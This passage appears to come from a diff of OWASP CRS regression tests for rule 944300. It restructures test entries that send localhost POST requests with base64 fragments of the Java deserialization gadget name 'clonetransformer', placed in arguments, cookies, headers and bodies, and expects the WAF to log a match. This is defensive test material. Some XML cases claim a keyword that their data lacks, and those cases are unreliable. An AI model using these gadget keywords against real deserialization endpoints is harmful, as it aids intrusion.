log_contains: "id \"944300\"" - - test_title: 944300-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 71 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 72 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 73 desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 74 desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 75 desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_id: 76 desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 77 desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 78 desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 79 desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 80 desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 81 desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 82 desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 83 desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 84 desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 85 desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 88 desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 89 desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 90 desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 91 desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 92 desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 93 desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 94 desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 95 desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 